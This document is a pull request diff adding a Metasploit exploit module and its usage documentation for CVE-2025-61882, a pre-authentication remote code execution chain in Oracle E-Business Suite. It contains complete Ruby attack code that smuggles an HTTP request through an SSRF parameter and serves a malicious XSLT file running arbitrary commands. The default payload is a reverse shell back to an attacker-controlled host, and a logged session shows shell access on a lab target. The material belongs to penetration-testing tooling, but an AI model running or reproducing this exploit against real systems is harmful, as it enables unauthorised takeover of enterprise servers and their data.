### PR TITLE
Add exploit oracle ebs CVE 2025 61882 module

### DIFF
--- a/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
+++ b/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
@@ -8,7 +8,7 @@ The flaw allows unauthenticated attackers to execute arbitrary code by leveragin
 ## Testing
 
 - App images files are available on Oracle website (Oracle Software Delivery Cloud)
-- You can follow this [setup guide for Oracle EBS](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox)
+- You can follow this [setup guide for Oracle EBS](https://web.archive.org/web/20230203132732/https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox)
 
 **Note**: 300 Go are required and a few hours for the inital image creation
 

--- a/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
+++ b/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
@@ -17,6 +17,7 @@ The flaw allows unauthenticated attackers to execute arbitrary code by leveragin
 1. Start msfconsole
 2. `use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce`
 3. `set RHOST <TARGET_IP_ADDRESS>`
+4.  set file serving port `set SRVPORT 1337`
 5. `set PAYLOAD (default is cmd/unix/reverse_bash)`
 6. `set LHOST <YOUR_ATTACKER_IP>`
 7. `set LPORT 4444`

--- a/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
+++ b/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
@@ -1,0 +1,110 @@
+## Vulnerable Application
+This module exploits CVE-2025-61882, a critical Remote Code Execution (RCE) vulnerability in Oracle E-Business Suite (EBS).
+The flaw allows unauthenticated attackers to execute arbitrary code by leveraging a combination of SSRF, HTTP request smuggling and XSLT injection.
+- **CVSS Score**: 9.8 Critical
+- **Affected Versions**: Oracle E-Business Suite, versions 12.2.3-12.2.14
+- **Tested On**: Oracle EBS 12.2.12 (Linux host)
+
+## Testing
+
+- App images files are available on Oracle website (Oracle Software Delivery Cloud)
+- You can follow this [setup guide for Oracle EBS](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox)
+
+**Note**: 300 Go are required and a few hours for the inital image creation
+
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+5. `set PAYLOAD (default is cmd/unix/reverse_bash)`
+6. `set LHOST <YOUR_ATTACKER_IP>`
+7. `set LPORT 4444`
+8. `check`
+9. `exploit`
+
+## Scenarios
+
+### Linux Command
+
+```
+use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce
+
+msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set LHOST 192.168.56.1
+LHOST => 192.168.56.1
+msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set SRVPORT 1337
+SRVPORT => 1337
+msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > set RHOSTS 192.168.56.104
+RHOSTS => 192.168.56.104
+
+show options
+
+Module options (exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   HTTP_TIMEOUT   20               yes       Time to wait for target to fetch XSL (seconds)
+   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS         192.168.56.104   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT          8000             yes       The target port (TCP)
+   SHELL_TIMEOUT  30               yes       Time to wait for shell after XSL delivery (seconds)
+   SRVHOST        0.0.0.0          yes       The local host to listen on for XSL callback
+   SRVPORT        1337             yes       The local port to listen on for XSL callback
+   SSL            false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                         no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI      /                yes       Base path to Oracle EBS
+   URIPATH                         no        The URI to use for this exploit (default is random)
+   VHOST                           no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.56.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux/Unix (Interactive Shell)
+
+
+msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > check
+[*] 192.168.56.104:8000 - The target appears to be vulnerable.
+
+
+msf6 exploit(multi/http/oracle_ebs_cve_2025_61882_exploit_rce) > exploit
+[*] Exploit running as background job 7.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Starting HTTP server on 0.0.0.0:1337
+[*] Using URL: http://192.168.56.1:1337/
+[*] XSL payload will be served at: http://192.168.56.1:1337/HexdwvgO.xsl
+[*] Retrieving CSRF token from target...
+[+] CSRF token retrieved: 86AJ-2RR3-XDNC-U9I4-Y...
+[*] Creating HTTP request smuggling payload...
+[*] Triggering exploitation via UiServlet...
+[+] Received request: GET /OA_HTML/ieshostedsurvey.xsl from 192.168.56.104:63162
+[+] Serving  XSL payload to 192.168.56.104...
+[+] XSL payload delivered successfully to 192.168.56.104 (1460 bytes)
+[*] Keeping HTTP server alive, waiting for callback to 192.168.56.1:4444...
+[*] (Press Ctrl-C to stop)
+[*] Waiting up to 30 seconds for reverse shell connection...
+[+] Session created successfully!
+[*] Server stopped.
+[*] Command shell session 7 opened (192.168.56.1:4444 -> 192.168.56.104:61062) at 2025-12-05 09:14:42 +0100
+sessions 7
+[*] Starting interaction with 7...
+
+id
+uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=system_u:system_r:initrc_t:s0
+uname -a
+Linux apps 5.4.17-2136.338.4.2.el7uek.x86_64 #3 SMP Mon Dec 23 14:42:43 PST 2024 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/u01/install/APPS/fs1/FMW_Home/user_projects/domains/EBS_domain
+
+```

--- a/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
+++ b/documentation/modules/exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.md
@@ -12,7 +12,6 @@ The flaw allows unauthenticated attackers to execute arbitrary code by leveragin
 
 **Note**: 300 Go are required and a few hours for the inital image creation
 
-
 ## Verification Steps
 1. Start msfconsole
 2. `use exploit/multi/http/oracle_ebs_cve_2025_61882_exploit_rce`

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -106,9 +106,6 @@ class MetasploitModule < Msf::Exploit::Remote
     if request.uri.include?('.xsl')
       print_good("Serving  XSL payload to #{cli.peerhost}...")
 
-      # Mark XSL file as served
-      @xsl_served = true
-
       xsl_content = generate_xsl_payload
 
       send_response(cli, xsl_content, {
@@ -116,7 +113,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'Content-Length' => xsl_content.length.to_s,
         'Connection' => 'close'
       })
-
+      
+      # Mark XSL file as served
+      @xsl_served = true
       print_good("XSL payload delivered successfully to #{cli.peerhost} (#{xsl_content.length} bytes)")
 
     else

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -1,0 +1,427 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle E-Business Suite CVE-2025-61882 RCE',
+        'Description' => %q{
+          This module exploits CVE-2025-61882 in Oracle E-Business Suite
+          by combining SSRF, Path Traversal, HTTP request smuggling and XSLT injection.
+
+          The exploit hosts a malicious XSL file
+          that the target will fetch and process, leading to RCE.
+
+          This module provides an interactive shell session.
+          Vulnerable versions affected are 12.2.3-12.2.14.
+        },
+        'Author' => [
+          'watchTowr (Sonny, Sina Kheirkhah, Jake Knott)', # Original Python POC and blog Article
+          'Mathieu Dupas' # Metasploit module development
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2025-61882'],
+          ['URL', 'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/' ],
+          ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2025-61882.html']
+        ],
+        'Platform' => ['unix', 'linux', 'win'],
+        'Targets' => [
+          [
+            'Linux/Unix (Interactive Shell)',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Windows (Interactive Shell)',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/reverse_powershell'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2025-10-04',
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
+          # Handler delay
+          'WfsDelay' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(8000),
+      OptString.new('TARGETURI', [true, 'Base path to Oracle EBS', '/']),
+      OptString.new('SRVHOST', [true, 'The local host to listen on for XSL callback', '0.0.0.0']),
+      OptPort.new('SRVPORT', [true, 'The local port to listen on for XSL callback', 8080]),
+      OptInt.new('HTTP_TIMEOUT', [true, 'Time to wait for target to fetch XSL (seconds)', 20]),
+      OptInt.new('SHELL_TIMEOUT', [true, 'Time to wait for shell after XSL delivery (seconds)', 30]),
+    ])
+  end
+
+  def check
+
+    vprint_status("Checking if target is vulnerable...")
+
+    unless oracle_ebs_detected?
+      return CheckCode::Safe
+    end
+
+    csrf_token = retrieve_csrf_token
+    unless csrf_token
+      return CheckCode::Unknown
+    end
+
+    if vulnerable_servlet_accessible?(csrf_token)
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  # Serve malicious XSLT file
+  def on_request_uri(cli, request)
+    print_good("Received request: #{request.method} #{request.uri} from #{cli.peerhost}:#{cli.peerport}")
+
+
+    if request.uri.include?('.xsl')
+      print_good("Serving  XSL payload to #{cli.peerhost}...")
+
+      # Mark XSL file as served
+      @xsl_served = true
+
+      xsl_content = generate_xsl_payload
+
+      send_response(cli, xsl_content, {
+        'Content-Type' => 'application/xml',
+        'Content-Length' => xsl_content.length.to_s,
+        'Connection' => 'close'
+      })
+
+      print_good("XSL payload delivered successfully to #{cli.peerhost} (#{xsl_content.length} bytes)")
+
+    else
+      print_warning("Unexpected request for #{request.uri}, #{cli.peerhost} sending 404")
+      send_not_found(cli)
+    end
+  end
+
+  def generate_xsl_payload
+     # Generate XSLT payload that will execute commands
+
+      command = payload.encoded
+      vprint_status("Generated command: #{command}")
+
+    # Adapt the command to the platform
+    case target['Platform']
+    when 'win', ['win']
+      base_cmd = ['cmd.exe', '/c']
+    else
+      base_cmd = ['bash', '-c']
+    end
+
+    # Escaping apostrophes and backslashes
+    escaped_command = command.gsub("\\", "\\\\\\\\").gsub("'", "\\\\'")
+
+    # JavaScript code that will be executed server side via XSLT
+    js = %Q|
+    var stringc = java.lang.Class.forName('java.lang.String');
+    var cmds = java.lang.reflect.Array.newInstance(stringc, 3);
+    java.lang.reflect.Array.set(cmds, 0, '#{base_cmd[0]}');
+    java.lang.reflect.Array.set(cmds, 1, '#{base_cmd[1]}');
+    java.lang.reflect.Array.set(cmds, 2, '#{escaped_command}');
+    var runtime = java.lang.Runtime.getRuntime();
+    var proc = runtime.exec(cmds);
+    1
+    |
+
+    # Encode in base64 to avoid problems with XML parsing
+    encoded_js = Rex::Text.encode_base64(js)
+
+    # Generate XSLT
+    xsl = %Q|<?xml version="1.0" encoding="UTF-8"?>
+<xsl:stylesheet version="1.0"
+    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
+    xmlns:b64="http://www.oracle.com/XSL/Transform/java/sun.misc.BASE64Decoder"
+    xmlns:jsm="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngineManager"
+    xmlns:eng="http://www.oracle.com/XSL/Transform/java/javax.script.ScriptEngine"
+    xmlns:str="http://www.oracle.com/XSL/Transform/java/java.lang.String">
+    <xsl:template match="/">
+        <xsl:variable name="bs" select="b64:decodeBuffer(b64:new(),'#{encoded_js}')"/>
+        <xsl:variable name="js" select="str:new($bs)"/>
+        <xsl:variable name="m" select="jsm:new()"/>
+        <xsl:variable name="e" select="jsm:getEngineByName($m, 'js')"/>
+        <xsl:variable name="code" select="eng:eval($e, $js)"/>
+        <xsl:value-of select="$code"/>
+    </xsl:template>
+</xsl:stylesheet>|
+
+    xsl
+  end
+
+  def exploit
+    @xsl_served = false
+    @session_created = false
+
+    # Step 1 : Start HTTP server for XSL file serving
+    print_status("Starting HTTP server on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+    start_service(
+      'Uri' => {
+        'Proc' => proc { |cli, request| on_request_uri(cli, request) },
+        'Path' => '/'
+      }
+    )
+
+    # Wait for server
+    sleep(1)
+
+    # construct server URL
+    server_url = get_uri
+    xsl_url = "#{server_url}#{Rex::Text.rand_text_alpha(8)}.xsl"
+    print_status("XSL payload will be served at: #{xsl_url}")
+
+    # Step 2: Get CSRF token
+    print_status("Retrieving CSRF token from target...")
+    csrf_token = retrieve_csrf_token
+
+    unless csrf_token
+      fail_with(Failure::Unknown, 'Could not retrieve CSRF token')
+    end
+
+    print_good("CSRF token retrieved: #{csrf_token[0..20]}...")
+
+    # Step 3: Smuggle payload
+    print_status("Creating HTTP request smuggling payload...")
+    smuggle_payload = create_smuggle_payload(xsl_url)
+
+    vprint_status("Smuggled payload created (#{smuggle_payload.length} bytes)")
+
+    # Step 4: Send exploit request
+    print_status("Triggering exploitation via UiServlet...")
+    send_exploit_request(smuggle_payload)
+
+    # Step 5: Wait for XSLT file download
+    print_status("Keeping HTTP server alive, waiting for callback to #{datastore['LHOST']}:#{datastore['LPORT']}...")
+    print_status("(Press Ctrl-C to stop)")
+
+    # Wait < HTTP_TIMEOUT seconds for XSL download
+    timeout = datastore['HTTP_TIMEOUT']
+    waited = 0
+
+    while waited < timeout
+      if @xsl_served
+        #vprint_good("XSL payload successfully delivered!")
+
+        # Wait for shell connection
+        shell_timeout = datastore['SHELL_TIMEOUT']
+        print_status("Waiting up to #{shell_timeout} seconds for reverse shell connection...")
+
+        shell_waited = 0
+        while shell_waited < shell_timeout
+          # Check session creation
+          if framework.sessions.length > 0
+            print_good("Session created successfully!")
+            @session_created = true
+            break
+          end
+
+          sleep(1)
+          shell_waited += 1
+
+          if shell_waited % 5 == 0
+            vprint_status("Waiting for shell... (#{shell_waited}/#{shell_timeout}s)")
+          end
+        end
+
+        break
+      end
+
+      sleep(1)
+      waited += 1
+
+      # Activity feedback
+      if waited % 5 == 0
+        vprint_status("Waiting for XSL request... (#{waited}/#{timeout}s)")
+      end
+    end
+
+    unless @xsl_served
+      print_error("Timeout waiting for target to fetch XSL payload")
+    end
+
+    unless @session_created
+      if @xsl_served
+        print_error("XSL was delivered but no session was created")
+      end
+    end
+
+    # Keep server active just in case
+    if @xsl_served && !@session_created
+      print_status("Keeping server alive for 10 more seconds in case of delay...")
+      sleep(10)
+    end
+  end
+
+  def retrieve_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
+      'keep_cookies' => true
+    })
+
+    return nil unless res
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
+      'headers' => {
+        'CSRF-XHR' => 'YES',
+        'FETCH-CSRF-TOKEN' => '1'
+      },
+      'keep_cookies' => true
+    })
+
+    if res && res.code == 200 && res.body
+      parts = res.body.split(':')
+      return parts[1].strip if parts.length >= 2
+    end
+
+    nil
+  rescue ::Rex::ConnectionError, ::Timeout::Error => e
+    vprint_error("Connection failed: #{e.class}")
+    nil
+  end
+
+  def create_smuggle_payload(xsl_url)
+
+    srvhost = datastore['SRVHOST']
+    srvport = datastore['SRVPORT']
+
+    if srvhost == '0.0.0.0'
+      srvhost = Rex::Socket.source_address(rhost)
+    end
+
+    smuggle_request = "POST /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2\r\n"
+    smuggle_request += "Host: #{srvhost}:#{srvport}\r\n"
+    smuggle_request += "User-Agent: #{Rex::Text.rand_text_alpha(10)}\r\n"
+    smuggle_request += "Connection: keep-alive\r\n"
+
+    # Add sessions cookies
+    cookies = get_cookies
+    if cookies && !cookies.empty?
+      smuggle_request += "Cookie: #{cookies}\r\n"
+    end
+
+    # Add POST request via CRLF
+    smuggle_request += "\r\n\r\n\r\nPOST /"
+
+    vprint_status("Smuggled request will target: #{srvhost}:#{srvport}")
+    vprint_status("Full smuggled request:")
+    vprint_line(smuggle_request) if datastore['VERBOSE']
+
+    # Encode payload in HTML entities
+    cook_smuggle_stub(smuggle_request)
+  end
+
+  def cook_smuggle_stub(payload)
+    payload = payload.sub(/^POST /, '').sub(/^GET /, '')
+
+    # Encode in HTML entities
+    payload.chars.map { |char| "&##{char.ord};" }.join
+  end
+
+  def send_exploit_request(encoded_payload)
+    # Encoded payload is inserted in return_url (SSRF)
+
+    xml = %Q|<?xml version="1.0" encoding="UTF-8"?><initialize><param name="init_was_saved">test</param><param name="return_url">http://apps.example.com:7201#{encoded_payload}</param><param name="ui_def_id">0</param><param name="config_effective_usage_id">0</param><param name="ui_type">Applet</param></initialize>|
+
+    vprint_status("Sending exploit to UiServlet...")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+      'vars_post' => {
+        'redirectFromJsp' => '1',
+        'getUiType' => xml
+      },
+      'keep_cookies' => true
+    })
+
+    if res
+      vprint_status("UiServlet responded with: #{res.code}")
+      vprint_status("Response body length: #{res.body.length} bytes") if res.body
+    else
+      print_warning("No response from UiServlet (this might be normal)")
+    end
+
+    res
+  end
+
+  def get_cookies
+    cookies = []
+    cookie_jar.cookies.each do |cookie|
+      cookies << "#{cookie.name}=#{cookie.value}"
+    end
+    cookies.join('; ')
+  end
+
+  def oracle_ebs_detected?
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp')
+    })
+
+    res && (res.headers['Server']&.include?('Oracle') ||
+            res.body&.include?('Oracle'))  # maybe to adapt for different versions. Fully Tested on version 12.2.12
+  rescue
+    false
+  end
+
+  def vulnerable_servlet_accessible?(csrf_token)
+    test_xml = '<?xml version="1.0" encoding="UTF-8"?>' \
+               '<initialize>' \
+               '<param name="init_was_saved">test</param>' \
+               '<param name="return_url">http://example.com/test</param>' \
+               '<param name="ui_def_id">0</param>' \
+               '<param name="config_effective_usage_id">0</param>' \
+               '<param name="ui_type">Applet</param>' \
+               '</initialize>'
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'configurator', 'UiServlet'),
+      'vars_post' => {
+        'redirectFromJsp' => '1',
+        'getUiType' => test_xml
+      },
+      'keep_cookies' => true
+    })
+
+    res && (res.code == 200 || res.code == 302)
+  rescue
+    false
+  end
+end

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -190,9 +190,6 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    # Wait for server
-    sleep(1)
-
     # construct server URL
     server_url = get_uri
     xsl_url = "#{server_url}#{Rex::Text.rand_text_alpha(8)}.xsl"

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -266,12 +266,6 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error("XSL was delivered but no session was created")
       end
     end
-
-    # Keep server active just in case
-    if @xsl_served && !@session_created
-      print_status("Keeping server alive for 10 more seconds in case of delay...")
-      sleep(10)
-    end
   end
 
   def retrieve_csrf_token

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -86,14 +86,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Checking if target is vulnerable...")
 
-    unless oracle_ebs_detected?
-      return CheckCode::Safe
-    end
+    return CheckCode::Safe unless oracle_ebs_detected?
 
     csrf_token = retrieve_csrf_token
-    unless csrf_token
-      return CheckCode::Unknown
-    end
+    return CheckCode::Unknown unless csrf_token
 
     if vulnerable_servlet_accessible?(csrf_token)
       return CheckCode::Appears

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -199,9 +199,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Retrieving CSRF token from target...")
     csrf_token = retrieve_csrf_token
 
-    unless csrf_token
-      fail_with(Failure::Unknown, 'Could not retrieve CSRF token')
-    end
+    fail_with(Failure::Unknown, 'Could not retrieve CSRF token') unless csrf_token
 
     print_good("CSRF token retrieved: #{csrf_token[0..20]}...")
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'win', ['win']
       base_cmd = ['cmd.exe', '/c']
     else
-      base_cmd = ['bash', '-c']
+      base_cmd = ['sh', '-c']
     end
 
     # Escaping apostrophes and backslashes

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Adapt the command to the platform
     case target['Platform']
-    when 'win', ['win']
+    when 'win'
       base_cmd = ['cmd.exe', '/c']
     else
       base_cmd = ['sh', '-c']

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -125,10 +125,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_xsl_payload
-     # Generate XSLT payload that will execute commands
+    # Generate XSLT payload that will execute commands
 
-      command = payload.encoded
-      vprint_status("Generated command: #{command}")
+    command = payload.encoded
+    vprint_status("Generated command: #{command}")
 
     # Adapt the command to the platform
     case target['Platform']
@@ -223,8 +223,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     while waited < timeout
       if @xsl_served
-        #vprint_good("XSL payload successfully delivered!")
-
+        
         # Wait for shell connection
         shell_timeout = datastore['SHELL_TIMEOUT']
         print_status("Waiting up to #{shell_timeout} seconds for reverse shell connection...")

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -342,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cook_smuggle_stub(payload)
-    payload = payload.sub(/^POST /, '').sub(/^GET /, '')
+    payload = payload.sub(/^(?:POST|GET) /, '')
 
     # Encode in HTML entities
     payload.chars.map { |char| "&##{char.ord};" }.join

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -345,7 +345,8 @@ class MetasploitModule < Msf::Exploit::Remote
     payload = payload.sub(/^(?:POST|GET) /, '')
 
     # Encode in HTML entities
-    payload.chars.map { |char| "&##{char.ord};" }.join
+    payload = Rex::Text.html_encode(payload)
+    
   end
 
   def send_exploit_request(encoded_payload)

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::Unknown, 'Could not retrieve CSRF token') unless csrf_token
 
-    print_good("CSRF token retrieved: #{csrf_token[0..20]}...")
+    print_good("CSRF token retrieved: #{csrf_token}")
 
     # Step 3: Smuggle payload
     print_status("Creating HTTP request smuggling payload...")

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -339,9 +339,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_exploit_request(encoded_payload)
     # Encoded payload is inserted in return_url (SSRF)
-
-    xml = %Q|<?xml version="1.0" encoding="UTF-8"?><initialize><param name="init_was_saved">test</param><param name="return_url">http://apps.example.com:7201#{encoded_payload}</param><param name="ui_def_id">0</param><param name="config_effective_usage_id">0</param><param name="ui_type">Applet</param></initialize>|
-
+    
+    xml = %Q|<?xml version="1.0" encoding="UTF-8"?>\
+    <initialize>\
+    <param name="init_was_saved">test</param>\
+    <param name="return_url">http://apps.example.com:7201#{encoded_payload}</param>\
+    <param name="ui_def_id">0</param>\
+    <param name="config_effective_usage_id">0</param>\
+    <param name="ui_type">Applet</param>\
+    </initialize>|
+    
     vprint_status("Sending exploit to UiServlet...")
 
     res = send_request_cgi({

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -123,8 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_xsl_payload
-    # Generate XSLT payload that will execute commands
-
+   
     command = payload.encoded
     vprint_status("Generated command: #{command}")
 

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         'Name' => 'Oracle E-Business Suite CVE-2025-61882 RCE',
-        'Description' => '
+        'Description' => %q{
           This module exploits CVE-2025-61882 in Oracle E-Business Suite
           by combining SSRF, Path Traversal, HTTP request smuggling and XSLT injection.
 
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           This module provides an interactive shell session.
           Vulnerable versions affected are 12.2.3-12.2.14.
-        ',
+        },
         'Author' => [
           'watchTowr (Sonny, Sina Kheirkhah, Jake Knott)', # Original Python POC and blog Article
           'Mathieu Dupas' # Metasploit module development

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -34,7 +34,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/' ],
           ['URL', 'https://www.oracle.com/security-alerts/alert-cve-2025-61882.html']
         ],
-        'Platform' => ['unix', 'linux', 'win'],
         'Targets' => [
           [
             'Linux/Unix (Interactive Shell)',

--- a/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
+++ b/modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -8,14 +10,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::Retry 
+  include Msf::Exploit::Retry
 
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Oracle E-Business Suite CVE-2025-61882 RCE',
-        'Description' => %q{
+        'Description' => '
           This module exploits CVE-2025-61882 in Oracle E-Business Suite
           by combining SSRF, Path Traversal, HTTP request smuggling and XSLT injection.
 
@@ -24,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
           This module provides an interactive shell session.
           Vulnerable versions affected are 12.2.3-12.2.14.
-        },
+        ',
         'Author' => [
           'watchTowr (Sonny, Sina Kheirkhah, Jake Knott)', # Original Python POC and blog Article
           'Mathieu Dupas' # Metasploit module development
@@ -32,17 +34,18 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2025-61882'],
-          ['URL', 'https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/' ],
+          ['URL',
